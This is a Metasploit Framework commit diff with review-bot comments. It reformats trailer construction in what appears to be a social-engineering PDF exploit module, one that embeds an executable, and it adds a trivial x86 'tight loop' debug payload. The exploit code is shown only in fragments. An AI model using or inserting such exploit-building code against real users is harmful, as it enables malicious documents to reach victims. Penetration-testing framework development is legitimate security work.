add payload/generic/tight_loop - x86 debug payload
git-svn-id: file:///home/svn/framework3/trunk@9070 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
56d50d6794
commit
321404e2fe
|
@ -67,8 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
trailers = pdf_objects[1]
|
trailers = pdf_objects[1]
|
||||||
startxrefs = pdf_objects[2]
|
startxrefs = pdf_objects[2]
|
||||||
root_obj = pdf_objects[3]
|
root_obj = pdf_objects[3]
|
||||||
|
|
||||||
|
|
||||||
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
|
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
|
||||||
|
|
||||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||||
|
@ -339,7 +338,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if trailers[0].has_key?("ID")
|
if trailers[0].has_key?("ID")
|
||||||
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
|
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
|
||||||
else
|
else
|
||||||
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n"
|
new_pdf << "xref\r\n" << xrefs
|
||||||
|
new_pdf << "trailer\r\n"
|
||||||
|
new_pdf << "<</Size #{new_size}/Prev #{startxref}"
|
||||||
|
new_pdf << "/Root #{trailers[0].fetch("Root")} R"
|
||||||
|
new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
|
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
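Review bot: The rewritten `else` branch now builds the trailer in five separate appends, while the `if trailers[0].has_key?("ID")` branch directly above still emits the same trailer as one long interpolated string. The two branches duplicate everything except the `/ID` entry and no longer read alike. Emitting the shared `xref`/`trailer`/`/Size`/`/Prev`/`/Root`/`/Info` part once and handling only the difference conditionally would remove the duplication, for example `new_pdf << "/ID#{trailers[0].fetch("ID")}" if trailers[0].has_key?("ID")` followed by `new_pdf << ">>\r\n"`. The enclosing method starts and ends outside the hunk, so this is judged only from the lines shown.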
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
##
|
||||||
|
# $Id$
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/generic'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Generic x86 Tight Loop',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Generate a tight loop in the target process',
|
||||||
|
'Author' => 'jduck',
|
||||||
|
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Payload' => "\xeb\xfe" # jump to self
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
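Review bot: The `'Description'` string does not say that this payload is a debugging aid, although the commit title calls it an "x86 debug payload". A reader of the module list sees only "Generate a tight loop in the target process". Something like `'Description' => 'Generate a tight loop in the target process (debugging aid: the thread spins in place and never returns)',` would state the intent and the consequence that the thread stays at full CPU. The `# jump to self` comment could also spell out the encoding, e.g. `# EB FE: jmp short -2 (branches back to itself)`. Separately, `require 'msf/core/payload/generic'` looks unused, since the module only mixes in `Msf::Payload::Single`; if nothing else depends on it, it could be dropped.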
|